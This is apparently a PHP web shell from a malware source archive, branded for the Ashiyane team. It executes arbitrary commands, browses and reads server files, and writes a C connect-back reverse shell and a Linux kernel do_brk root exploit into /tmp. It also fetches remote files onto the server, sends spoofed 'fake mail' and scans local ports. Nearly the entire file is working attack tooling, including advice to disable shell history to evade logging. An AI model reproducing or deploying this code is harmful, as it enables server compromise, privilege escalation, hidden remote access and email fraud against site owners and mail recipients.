mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
652 lines
27 KiB
Plaintext
652 lines
27 KiB
Plaintext
<CENTER>
|
|
<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">
|
|
<font color="#00FF00">
|
|
<marquee scrolldelay="30" scrollamount="2">Ashiyane Digital Security Team </marquee></font></DIV>
|
|
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;"> <p>
|
|
<span style="font-weight: 400"><font color="#0000FF">/server Irc.Ashiyane.com
|
|
/j #virus #Ashiyane</font></span></p>
|
|
<p><font color="#FF0000"><b>Virus@Ashiyane.com<BR>
|
|
</b></font></DIV>
|
|
<?php
|
|
|
|
//
|
|
closelog( );
|
|
|
|
$dono = get_current_user( );
|
|
$ver = phpversion( );
|
|
$login = posix_getuid( );
|
|
$euid = posix_geteuid( );
|
|
$gid = posix_getgid( );
|
|
if ($chdir == "") $chdir = getcwd( );
|
|
|
|
?>
|
|
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
|
|
<?php
|
|
|
|
$uname = posix_uname( );
|
|
while (list($info, $value) = each ($uname)) {
|
|
|
|
?>
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>
|
|
<font color="#F3B700">:</font></DIV></TD>
|
|
</TR>
|
|
<?php
|
|
}
|
|
?>
|
|
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
|
<font color="#F3B700">Script Current User: <?= $dono ?></font></DIV></TD>
|
|
</TR>
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
|
<font color="#F3B700">PHP Version: <?= $ver ?></font></DIV></TD>
|
|
</TR>
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
|
<font color="#F3B700">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</font></DIV></TD>
|
|
</TR>
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
|
<font color="#F3B700">Current Path: <?= $chdir ?></font></DIV></TD>
|
|
</TR>
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
|
<font color="#F3B700">Server IP: <?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?>
|
|
</font></DIV></TD>
|
|
</TR>
|
|
<TR>
|
|
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
|
|
<font color="#F3B700">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
|
|
</font></DIV></TD>
|
|
</TR>
|
|
</TABLE>
|
|
<BR>
|
|
<?php
|
|
|
|
if ($cmd != "") {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*]
|
|
<font color="#0000FF">Command Mode Run</DIV></font>";
|
|
|
|
?>
|
|
|
|
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">
|
|
<font color="#FF0000">Command Prompt</font></DIV>
|
|
<?php
|
|
|
|
if ($fe == 1){
|
|
$fe = "exec";
|
|
}
|
|
if ($fe == ""){
|
|
$fe = "passthru";
|
|
}
|
|
if ($fe == "2"){
|
|
$fe = "system";
|
|
}
|
|
|
|
if (isset($chdir)) @chdir($chdir);
|
|
|
|
ob_start( );
|
|
$fe("$cmd 2>&1");
|
|
$output = ob_get_contents();
|
|
ob_end_clean( );
|
|
|
|
?>
|
|
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
|
|
<?php
|
|
|
|
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
|
|
?>
|
|
</TEXTAREA>
|
|
<BR>
|
|
<?php
|
|
|
|
}
|
|
|
|
if ($safemode != "") {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*]
|
|
<font color="#FF00FF">Safemode Mode Run</DIV></font>";
|
|
|
|
?>
|
|
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">
|
|
<font color="#FF0000">Safe Mode Directory Listing</font></DIV>
|
|
<?php
|
|
|
|
if ($dir = @opendir($chdir)) {
|
|
echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
|
|
echo "<TR>";
|
|
echo "<TD valign=top>";
|
|
echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
|
|
while (($file = readdir($dir)) !== false) {
|
|
if (@is_file($file)) {
|
|
$file1 = fileowner($file);
|
|
$file2 = fileperms($file);
|
|
echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
|
|
// echo "<font color=green>$file1 - $file2 - $file </font><br>";
|
|
flush( );
|
|
}
|
|
}
|
|
|
|
echo "</TD>";
|
|
echo"<TD valign=top>";
|
|
echo "<font size=2 face=arial><font color="#FF00FF"><b>List Only Folders</b>
|
|
</font> <br><br>";
|
|
if ($dir = @opendir($chdir)) {
|
|
while (($file = readdir($dir)) !== false) {
|
|
if (@is_dir($file)) {
|
|
$file1 = fileowner($file);
|
|
$file2 = fileperms($file);
|
|
echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>";
|
|
// echo "<font color=blue>$file1 - $file2 - $file </font><br>";
|
|
}
|
|
}
|
|
}
|
|
echo "</TD>";
|
|
echo"<TD valign=top>";
|
|
echo "</font><font color=#00FF00><b>List Writable Folders</b></font><font color=blue><br><br>";
|
|
if ($dir = @opendir($chdir)) {
|
|
while (($file = readdir($dir)) !== false) {
|
|
if (@is_writable($file) && @is_dir($file)) {
|
|
$file1 = fileowner($file);
|
|
$file2 = fileperms($file);
|
|
echo "<font color=red>$file1 - $file2 - $file </font><br>";
|
|
}
|
|
}
|
|
}
|
|
echo "</TD>";
|
|
echo "</TD>";
|
|
echo "<TD valign=top>";
|
|
echo "</font><font color=#00FF00><b>List Writable Files</b> </font><font color=blue> <br><br>";
|
|
|
|
if ($dir = opendir($chdir)) {
|
|
while (($file = readdir($dir)) !== false) {
|
|
if (@is_writable($file) && @is_file($file)) {
|
|
$file1 = fileowner($file);
|
|
$file2 = fileperms($file);
|
|
echo "<font color=red>$file1 - $file2 - $file </font><br>";
|
|
}
|
|
}
|
|
}
|
|
echo "</TD>";
|
|
echo "</TR>";
|
|
echo "</TABLE>";
|
|
}
|
|
}
|
|
|
|
?>
|
|
<?php
|
|
|
|
if ($shell == "write") {
|
|
$shell = "#include <stdio.h>\n" .
|
|
"#include <sys/socket.h>\n" .
|
|
"#include <netinet/in.h>\n" .
|
|
"#include <arpa/inet.h>\n" .
|
|
"#include <netdb.h>\n" .
|
|
"int main(int argc, char **argv) {\n" .
|
|
" char *host;\n" .
|
|
" int port = 80;\n" .
|
|
" int f;\n" .
|
|
" int l;\n" .
|
|
" int sock;\n" .
|
|
" struct in_addr ia;\n" .
|
|
" struct sockaddr_in sin, from;\n" .
|
|
" struct hostent *he;\n" .
|
|
" char msg[ ] = \"Welcome to Haji virus Connect Back Shell\\n\\n\"\n" .
|
|
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
|
|
" \"For More Reliable Shell.\\n\"\n" .
|
|
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
|
|
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
|
|
" printf(\"Haji virus Connect Back Backdoor\\n\\n\");\n" .
|
|
" if (argc < 2 || argc > 3) {\n" .
|
|
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Dumping Arguments\\n\");\n" .
|
|
" l = strlen(argv[1]);\n" .
|
|
" if (l <= 0) {\n" .
|
|
" printf(\"[-] Invalid Host Name\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" if (!(host = (char *) malloc(l))) {\n" .
|
|
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" strncpy(host, argv[1], l);\n" .
|
|
" if (argc == 3) {\n" .
|
|
" port = atoi(argv[2]);\n" .
|
|
" if (port <= 0 || port > 65535) {\n" .
|
|
" printf(\"[-] Invalid Port Number\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Resolving Host Name\\n\");\n" .
|
|
" he = gethostbyname(host);\n" .
|
|
" if (he) {\n" .
|
|
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
|
|
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
|
|
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" sin.sin_family = PF_INET;\n" .
|
|
" sin.sin_addr.s_addr = ia.s_addr;\n" .
|
|
" sin.sin_port = htons(port);\n" .
|
|
" printf(\"[*] Connecting...\\n\");\n" .
|
|
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
|
|
" printf(\"[-] Socket Error\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
|
|
" printf(\"[-] Unable to Connect\\n\");\n" .
|
|
" return 1;\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Spawning Shell\\n\");\n" .
|
|
" f = fork( );\n" .
|
|
" if (f < 0) {\n" .
|
|
" printf(\"[-] Unable to Fork\\n\");\n" .
|
|
" return 1;\n" .
|
|
" } else if (!f) {\n" .
|
|
" write(sock, msg, sizeof(msg));\n" .
|
|
" dup2(sock, 0);\n" .
|
|
" dup2(sock, 1);\n" .
|
|
" dup2(sock, 2);\n" .
|
|
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
|
|
" close(sock);\n" .
|
|
" return 0;\n" .
|
|
" }\n" .
|
|
" printf(\"[*] Detached\\n\\n\");\n" .
|
|
" return 0;\n" .
|
|
"}\n";
|
|
|
|
$fp = fopen("/tmp/dc-connectback.c", "w");
|
|
$ok = fwrite($fp, $shell);
|
|
|
|
if (!empty($ok)) {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
|
|
} else {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
|
|
}
|
|
}
|
|
|
|
if ($kernel == "write") {
|
|
$kernel = "/*\n" .
|
|
" * hatorihanzo.c\n" .
|
|
" * Linux kernel do_brk vma overflow exploit.\n" .
|
|
" *\n" .
|
|
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
|
|
" *\n" .
|
|
" * Further research and exploit development by\n" .
|
|
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
|
|
" *\n" .
|
|
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
|
|
" *\n" .
|
|
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
|
|
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
|
|
"*/\n" .
|
|
"#define _GNU_SOURCE\n" .
|
|
"#include <stdio.h>\n" .
|
|
"#include <stdlib.h>\n" .
|
|
"#include <errno.h>\n" .
|
|
"#include <string.h>\n" .
|
|
"#include <unistd.h>\n" .
|
|
"#include <fcntl.h>\n" .
|
|
"#include <signal.h>\n" .
|
|
"#include <paths.h>\n" .
|
|
"#include <grp.h>\n" .
|
|
"#include <setjmp.h>\n" .
|
|
"#include <stdint.h>\n" .
|
|
"#include <sys/mman.h>\n" .
|
|
"#include <sys/ipc.h>\n" .
|
|
"#include <sys/shm.h>\n" .
|
|
"#include <sys/ucontext.h>\n" .
|
|
"#include <sys/wait.h>\n" .
|
|
"#include <asm/ldt.h>\n" .
|
|
"#include <asm/page.h>\n" .
|
|
"#include <asm/segment.h>\n" .
|
|
"#include <linux/unistd.h>\n" .
|
|
"#include <linux/linkage.h>\n" .
|
|
"#define kB * 1024\n" .
|
|
"#define MB * 1024 kB\n" .
|
|
"#define GB * 1024 MB\n" .
|
|
"#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" .
|
|
"#define ENTRY_MAGIC 0\n" .
|
|
"#define ENTRY_GATE 2\n" .
|
|
"#define ENTRY_CS 4\n" .
|
|
"#define ENTRY_DS 6\n" .
|
|
"#define CS ((ENTRY_CS << 2) | 4)\n" .
|
|
"#define DS ((ENTRY_DS << 2) | 4)\n" .
|
|
"#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" .
|
|
"#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
|
|
"#define TOP_ADDR 0xFFFFE000U\n" .
|
|
"/* configuration */\n" .
|
|
"unsigned task_size;\n" .
|
|
"unsigned page;\n" .
|
|
"uid_t uid;\n" .
|
|
"unsigned address;\n" .
|
|
"int dontexit = 0;\n" .
|
|
"void fatal(char * msg)\n" .
|
|
"{\n" .
|
|
" fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
|
|
" if (dontexit) {\n" .
|
|
" fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
|
|
" kill(getpid(), SIGSTOP);\n" .
|
|
" for (;;) pause();\n" .
|
|
" }\n" .
|
|
" exit(EXIT_FAILURE);\n" .
|
|
"}\n" .
|
|
"void configure(void)\n" .
|
|
"{\n" .
|
|
" unsigned val;\n" .
|
|
" task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
|
|
" uid = getuid();\n" .
|
|
"}\n" .
|
|
"void expand(void)\n" .
|
|
"{\n" .
|
|
" unsigned top = (unsigned) sbrk(0);\n" .
|
|
" unsigned limit = address + PAGE_SIZE;\n" .
|
|
" do {\n" .
|
|
" if (sbrk(PAGE_SIZE) == NULL)\n" .
|
|
" fatal(\"Kernel seems not to be vulnerable\");\n" .
|
|
" dontexit = 1;\n" .
|
|
" top += PAGE_SIZE;\n" .
|
|
" } while (top < limit);\n" .
|
|
"}\n" .
|
|
"jmp_buf jmp;\n" .
|
|
"#define MAP_NOPAGE 1\n" .
|
|
"#define MAP_ISPAGE 2\n" .
|
|
"void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
|
|
"{\n" .
|
|
" struct ucontext * uc = (struct ucontext *) ptr;\n" .
|
|
" int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
|
|
" (void)signo;\n" .
|
|
" (void)si;\n" .
|
|
" error_code = MAP_NOPAGE + (error_code & 1);\n" .
|
|
" longjmp(jmp, error_code);\n" .
|
|
"}\n" .
|
|
"void prepare(void)\n" .
|
|
"{\n" .
|
|
" struct sigaction sa;\n" .
|
|
" sa.sa_sigaction = sigsegv;\n" .
|
|
" sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
|
|
" sigemptyset(&sa.sa_mask);\n" .
|
|
" sigaction(SIGSEGV, &sa, NULL);\n" .
|
|
"}\n" .
|
|
"int testaddr(unsigned addr)\n" .
|
|
"{\n" .
|
|
" int val;\n" .
|
|
" val = setjmp(jmp);\n" .
|
|
" if (val == 0) {\n" .
|
|
" asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
|
|
" return MAP_ISPAGE;\n" .
|
|
" }\n" .
|
|
" return val;\n" .
|
|
"}\n" .
|
|
"#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
|
|
"#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
|
|
"#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
|
|
"void map(unsigned * map)\n" .
|
|
"{\n" .
|
|
" unsigned addr = task_size;\n" .
|
|
" unsigned bit = 1;\n" .
|
|
" prepare();\n" .
|
|
" while (addr < TOP_ADDR) {\n" .
|
|
" if (testaddr(addr) == MAP_ISPAGE)\n" .
|
|
" *map |= bit;\n" .
|
|
" addr += PAGE_SIZE;\n" .
|
|
" next(map, bit);\n" .
|
|
" }\n" .
|
|
" signal(SIGSEGV, SIG_DFL);\n" .
|
|
"}\n" .
|
|
"void find(unsigned * m)\n" .
|
|
"{\n" .
|
|
" unsigned addr = task_size;\n" .
|
|
" unsigned bit = 1;\n" .
|
|
" unsigned count;\n" .
|
|
" unsigned tmp;\n" .
|
|
" prepare();\n" .
|
|
" tmp = address = count = 0U;\n" .
|
|
" while (addr < TOP_ADDR) {\n" .
|
|
" int val = testaddr(addr);\n" .
|
|
" if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
|
|
" if (!tmp) tmp = addr;\n" .
|
|
" count++;\n" .
|
|
" } else {\n" .
|
|
" if (tmp && count == LDT_PAGES) {\n" .
|
|
" errno = EAGAIN;\n" .
|
|
" if (address)\n" .
|
|
" fatal(\"double allocation\\n\");\n" .
|
|
" address = tmp;\n" .
|
|
" }\n" .
|
|
" tmp = count = 0U;\n" .
|
|
" }\n" .
|
|
" addr += PAGE_SIZE;\n" .
|
|
" next(m, bit);\n" .
|
|
" }\n" .
|
|
" signal(SIGSEGV, SIG_DFL);\n" .
|
|
" if (address)\n" .
|
|
" return;\n" .
|
|
" errno = ENOTSUP;\n" .
|
|
" fatal(\"Unable to determine kernel address\");\n" .
|
|
"}\n" .
|
|
"int modify_ldt(int, void *, unsigned);\n" .
|
|
"void ldt(unsigned * m)\n" .
|
|
"{\n" .
|
|
" struct modify_ldt_ldt_s l;\n" .
|
|
" map(m);\n" .
|
|
" memset(&l, 0, sizeof(l));\n" .
|
|
" l.entry_number = LDT_ENTRIES - 1;\n" .
|
|
" l.seg_32bit = 1;\n" .
|
|
" l.base_addr = MAGIC >> 16;\n" .
|
|
" l.limit = MAGIC & 0xffff;\n" .
|
|
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
|
|
" fatal(\"Unable to set up LDT\");\n" .
|
|
" l.entry_number = ENTRY_MAGIC / 2;\n" .
|
|
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
|
|
" fatal(\"Unable to set up LDT\");\n" .
|
|
" find(m);\n" .
|
|
"}\n" .
|
|
"asmlinkage void kernel(unsigned * task)\n" .
|
|
"{\n" .
|
|
" unsigned * addr = task;\n" .
|
|
" /* looking for uids */\n" .
|
|
" while (addr[0] != uid || addr[1] != uid ||\n" .
|
|
" addr[2] != uid || addr[3] != uid)\n" .
|
|
" addr++;\n" .
|
|
" addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" .
|
|
" addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" .
|
|
" addr[8] = 0;\n" .
|
|
" /* looking for vma */\n" .
|
|
" for (addr = (unsigned *) task_size; addr; addr++) {\n" .
|
|
" if (addr[0] >= task_size && addr[1] < task_size &&\n" .
|
|
" addr[2] == address && addr[3] >= task_size) {\n" .
|
|
" addr[2] = task_size - PAGE_SIZE;\n" .
|
|
" addr = (unsigned *) addr[3];\n" .
|
|
" addr[1] = task_size - PAGE_SIZE;\n" .
|
|
" addr[2] = task_size;\n" .
|
|
" break;\n" .
|
|
" }\n" .
|
|
" }\n" .
|
|
"}\n" .
|
|
"void kcode(void);\n" .
|
|
"#define __str(s) #s\n" .
|
|
"#define str(s) __str(s)\n" .
|
|
"void __kcode(void)\n" .
|
|
"{\n" .
|
|
" asm(\n" .
|
|
" \"kcode: \\n\"\n" .
|
|
" \" pusha \\n\"\n" .
|
|
" \" pushl %es \\n\"\n" .
|
|
" \" pushl %ds \\n\"\n" .
|
|
" \" movl $(\" str(DS) \") ,%edx \\n\"\n" .
|
|
" \" movl %edx,%es \\n\"\n" .
|
|
" \" movl %edx,%ds \\n\"\n" .
|
|
" \" movl $0xffffe000,%eax \\n\"\n" .
|
|
" \" andl %esp,%eax \\n\"\n" .
|
|
" \" pushl %eax \\n\"\n" .
|
|
" \" call kernel \\n\"\n" .
|
|
" \" addl $4, %esp \\n\"\n" .
|
|
" \" popl %ds \\n\"\n" .
|
|
" \" popl %es \\n\"\n" .
|
|
" \" popa \\n\"\n" .
|
|
" \" lret \\n\"\n" .
|
|
" );\n" .
|
|
"}\n" .
|
|
"void knockout(void)\n" .
|
|
"{\n" .
|
|
" unsigned * addr = (unsigned *) address;\n" .
|
|
" if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
|
|
" fatal(\"Unable to change page protection\");\n" .
|
|
" errno = ESRCH;\n" .
|
|
" if (addr[ENTRY_MAGIC] != MAGIC)\n" .
|
|
" fatal(\"Invalid LDT entry\");\n" .
|
|
" /* setting call gate and privileged descriptors */\n" .
|
|
" addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
|
|
" addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
|
|
" addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
|
|
" addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
|
|
" addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" .
|
|
" addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
|
|
" prepare();\n" .
|
|
" if (setjmp(jmp) != 0) {\n" .
|
|
" errno = ENOEXEC;\n" .
|
|
" fatal(\"Unable to jump to call gate\");\n" .
|
|
" }\n" .
|
|
" asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" .
|
|
"}\n" .
|
|
"void shell(void)\n" .
|
|
"{\n" .
|
|
" char * argv[] = { _PATH_BSHELL, NULL };\n" .
|
|
" execve(_PATH_BSHELL, argv, environ);\n" .
|
|
" fatal(\"Unable to spawn shell\\n\");\n" .
|
|
"}\n" .
|
|
"void remap(void)\n" .
|
|
"{\n" .
|
|
" static char stack[8 MB]; /* new stack */\n" .
|
|
" static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
|
|
" static unsigned * m;\n" .
|
|
" static unsigned b;\n" .
|
|
" m = (unsigned *) sbrk(map_size);\n" .
|
|
" if (!m)\n" .
|
|
" fatal(\"Unable to allocate memory\");\n" .
|
|
" environ = envp;\n" .
|
|
" asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
|
|
" b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
|
|
" if (munmap((void*)b, task_size - b) == -1)\n" .
|
|
" fatal(\"Unable to unmap stack\");\n" .
|
|
" while (b < task_size) {\n" .
|
|
" if (sbrk(PAGE_SIZE) == NULL)\n" .
|
|
" fatal(\"Unable to expand BSS\");\n" .
|
|
" b += PAGE_SIZE;\n" .
|
|
" }\n" .
|
|
" ldt(m);\n" .
|
|
" expand();\n" .
|
|
" knockout();\n" .
|
|
" shell();\n" .
|
|
"}\n" .
|
|
"int main(void)\n" .
|
|
"{\n" .
|
|
" configure();\n" .
|
|
" remap();\n" .
|
|
" return EXIT_FAILURE;\n" .
|
|
"}\n";
|
|
|
|
$fp = fopen("/tmp/xpl_brk.c", "w");
|
|
$ok = fwrite($fp, $kernel);
|
|
|
|
if (!empty($ok)) {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
|
|
} else {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
|
|
}
|
|
}
|
|
|
|
?>
|
|
</CENTER>
|
|
<pre><font face="Tahoma" size="2">
|
|
<?php
|
|
|
|
// Function to Visualize Source Code files
|
|
if ($see != "") {
|
|
$fp = fopen($see, "r");
|
|
$read = fread($fp, 30000);
|
|
echo "============== $see ================<br>";
|
|
echo "<textarea name=textarea cols=80 rows=15>";
|
|
echo "$read";
|
|
Echo "</textarea>";
|
|
}
|
|
|
|
// Function to Dowload Local Xploite Binary COde or Source Code
|
|
|
|
if ($dx != "") {
|
|
$fp = @fopen("$hostxpl",r);
|
|
$fp2 = @fopen("$storage","w");
|
|
fwrite($fp2, "");
|
|
$fp1 = @fopen("$storage","a+");
|
|
for (;;) {
|
|
$read = @fread($fp, 4096);
|
|
if (empty($read)) break;
|
|
$ok = fwrite($fp1, $read);
|
|
|
|
if (empty($ok)) {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
|
|
break;
|
|
}
|
|
}
|
|
|
|
if (!empty($ok)) {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
|
|
}
|
|
}
|
|
|
|
flush( );
|
|
|
|
// Function to visulize Format Color Source Code PHP
|
|
|
|
if ($sfc != "") {
|
|
$showcode = show_source("$sfc");
|
|
echo "<font size=4> $showcode </font>";
|
|
}
|
|
|
|
// Function to Visualize all infomation files
|
|
if ($fileinfo != "") {
|
|
$infofile = stat("$fileanalize");
|
|
while (list($info, $value) = each ($infofile)) {
|
|
echo" Info: $info Value: $value <br>";
|
|
}
|
|
}
|
|
|
|
// Function to send fake mail
|
|
if ($fake == 1) {
|
|
echo "<FORM METHOD=POST ACTION=%22$SCRIPT_NAME?$QUERY_STRING&send=1/">";
|
|
echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\" size="20"><br>";
|
|
echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\" size="20"><br>";
|
|
echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\" size="20"><br>";
|
|
echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
|
|
echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\" size="20"><br>";
|
|
echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\" size="20">";
|
|
echo "</FORM>";
|
|
}
|
|
|
|
if($send == 1) {
|
|
if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
|
|
} else {
|
|
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
|
|
}
|
|
}
|
|
|
|
if ($portscan != "") {
|
|
$port = array ("21","22","23","25","110",);
|
|
$values = count($port);
|
|
for ($cont=0; $cont < $values; $cont++) {
|
|
@$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
|
|
$service = Getservbyport($port[$cont],"tcp");
|
|
@$get = fgets($sock[$cont]);
|
|
echo "<br>Port: $port[$cont] - Service: $service<br><br>";
|
|
echo "<br>Banner: $get <br><br>";
|
|
flush();
|
|
}
|
|
}
|
|
|
|
?>
|
|
</font></pre> |